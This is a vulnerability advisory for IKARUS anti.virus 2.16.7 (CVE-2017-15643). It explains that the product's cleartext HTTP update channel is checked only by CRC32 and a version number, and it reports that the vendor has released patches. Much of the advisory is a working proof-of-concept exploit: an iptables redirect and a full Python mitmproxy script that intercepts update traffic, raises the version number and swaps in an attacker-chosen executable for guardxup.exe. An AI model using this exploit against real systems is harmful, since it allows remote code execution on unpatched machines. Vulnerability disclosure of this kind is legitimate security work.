## Vulnerability summary
The following advisory describes an remote code execution found in Ikraus Anti Virus version 2.16.7.
KARUS anti.virus “secures your personal data and PC from all kinds of malware. Additionally, the Anti-SPAM module protects you from SPAM and malware from e-mails. Prevent intrusion and protect yourself against cyber-criminals by choosing IKARUS anti.virus, powered by the award-winning IKARUS scan.engine. It is among the best in the world, detecting new and existing threats every day. ”
## Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
## Vendor Response
Update 1
CVE: CVE-2017-15643
The vendor has released patches to address these vulnerabilities.
For more information: https://www.ikarussecurity.com/about-ikarus/security-blog/vulnerability-in-windows-antivirus-products-ik-sa-2017-0001/
## Vulnerability details
An active network attacker (MiTM) can achieve remote code execution on a machine that runs Ikraus Anti Virus.
Ikarus AV for windows uses cleartext HTTP for updates along with a CRC32 checksum and an update value for verification of the downloaded files.
Also ikarus checks for a update version number which can be incremented to goad the process to update.
The update process executable in ikarus called guardxup.exe
guardxup.exe, send over port 80, the following request for update:
```
GET /cgi-bin/virusutilities.pl?A=7534ED66&B=6.1.1.0.11.1.256.7601&C=1005047.2013019.2001016.98727&F=4.5.2%3bO=0%3bSP=0&E=WD-194390-VU HTTP/1.1
Accept: */*
User-Agent: virusutilities(6.1,0,1005047)
Host: updates.ikarus.at
Connection: close
```
The server will respond with:
```
HTTP/1.1 200 OK
Date: Sun, 23 Oct 2016 04:51:05 GMT
Server: Apache/2.4.10 (Debian) mod_perl/2.0.9dev Perl/v5.20.2
Content-Disposition: inline; filename=virusutilities
Content-Length: 306
Connection: close
Content-Type: text/plain; charset=ISO-8859-1
<url>
full http://mirror04.ikarus.at/updates/
diff http://mirror06.ikarus.at/updates/
</url>
<up>
antispam_w64 001000076
antispam 001000076
update 001005047
virusutilities 002013019
t3modul_w64 002001016
t3modul 002001016
sdb 000007074
t3sigs 000098727
</up>
<dependence>
t3modul
</dependence>
```
```
Through the proxy we will modify the response and add 1 to the ‘update’ value and forward the response to the client.
Then the client will request the update via this url: http://mirror04.ikarus.at/updates/guardxup001005048.full
The ikarus server will respond with a 404:
```
HTTP/1.1 404 Not Found
Server: nginx/1.6.2
Date: Sun, 23 Oct 2016 04:53:05 GMT
Content-Type: text/html
Content-Length: 168
Connection: close
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.6.2</center>
</body>
</html>
```
But we will modify the response with a IKUP format:
```
Bytes: 0x0 - 0x3 == IKUP # header
Bytes: 0x4 - 0x7 == 0x0s
Bytes: 0x8 == 0x3C # pointer to start of PE EXE MZ header
Bytes: 0x20 - 0x23 == update value in little endian (script fixes it up)
Bytes: 0x24 - 0x27 == crc32 checksum (script populates from provided binary)
Bytes: 0x28 -> pointer to MZ header == 0x0s
Bytes: 'pointer to MZ header' -> ? == appended exe
```
Then we will forward to the update to the client, where it replaces guardxup.exe with our executable.
## Proof of concept
Please install mitmproxy 0.17 – pip install mitmproxy==0.17
To use this script, you’ll need to MITM port 80 traffic from the client for use with a transparent proxy.
Set your firewall rules to intercept 80 traffic on port 8080:
```
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
```
and execute the script as follows:
```
./poc.py file_to_deploy.exe
```
```
#!/usr/bin/env python2
import os
try:
from mitmproxy import controller, proxy, platform
from mitmproxy.proxy.server import ProxyServer
except:
from libmproxy import controller, proxy, platform
from libmproxy.proxy.server import ProxyServer
import re
import struct
import sys
import zlib
import bz2
class IkarusPOC(controller.Master):
def __init__(self, server, backdoored_file):
controller.Master.__init__(self, server)
self.ikarus= {}
self.crc_file = 0
self.backdoored_file = backdoored_file
self.to_replace = 0
self.already_patched = 0
self.update_number = 0
def win_header(self):
self.update_header = "\x49\x4B\x55\x50\x00\x00\x00\x00\x3C\x00\x00\x00\x00\x00\x00\x00"
self.update_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
self.update_header += struct.pack("<I", self.to_replace) # update number
self.update_header += struct.pack("<I", self.crc_file) # checksum
self.update_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
self.update_header += "\x00\x00\x00\x00"
def run(self):
try:
return controller.Master.run(self)
except KeyboardInterrupt:
self.shutdown()
def crc_stream(self, a_string):
prev = 0
return zlib.crc32(a_string, prev) & 0xFFFFFFFF
def crc(self, some_file):
prev = 0
for eachLine in open(some_file,"rb"):
prev = zlib.crc32(eachLine, prev)
self.crc_file = prev & 0xFFFFFFFF
print "[*] crc_file", self.crc_file
def handle_request(self, flow):
hid = (flow.request.host, flow.request.port)
flow.reply()
def handle_response(self, flow):
print "[*] flow.request.host:", flow.request.host
if "cgi-bin/imsa-lite.pl" in flow.request.path and "Dalvik" in flow.request.headers['User-Agent'] and self.already_patched <=2:
content = flow.reply.obj.response.content
p = re.compile("antispam[\s|\t].*\n")
result = p.search(content)
the_result = result.group(0)
original_update_number= [int(s) for s in the_result.split() if s.isdigit()][0]
if self.update_number == 0:
self.update_number = original_update_number
self.to_replace = self.update_number + 1
content = content.replace(str(original_update_number), str(self.to_replace))
flow.reply.obj.response.content = content
if "cgi-bin/virusutilities.pl" in flow.request.path and 'virusutilities' in flow.request.headers['User-Agent'] and self.already_patched <= 2:
print "[*] Found update response, modifying..."
content = flow.reply.obj.response.content
p = re.compile("update[\s|\t].*\n")
result = p.search(content)
the_result = result.group(0)
original_update_number = [int(s) for s in the_result.split() if s.isdigit()][0]
if self.update_number == 0:
self.update_number = original_update_number
self.to_replace = self.update_number + 1
print '[*] Update_number', self.update_number
print '[*] Replace number', self.to_replace
content = content.replace(str(original_update_number), str(self.to_replace))
print "[*] Updated content", content
flow.reply.obj.response.content = content
if 'guard' in flow.request.path and 'full' in flow.request.path and self.already_patched <= 2:
print '[*] Found guardxup.exe request! Modifying request and pushing provided file!'
self.crc(self.backdoored_file)
self.win_header()
with open(self.backdoored_file, 'rb') as f:
file_out = f.read()
content = self.update_header + file_out
with open('/tmp/update_test.full', 'wb') as f:
f.write(content)
flow.reply.obj.response.content = content
flow.reply.obj.response.status_code = 200
self.already_patched += 1
flow.reply()
config = proxy.ProxyConfig(port=8080, mode='transparent')
server = ProxyServer(config)
m = IkarusPOC(server, sys.argv[1])
m.run()
```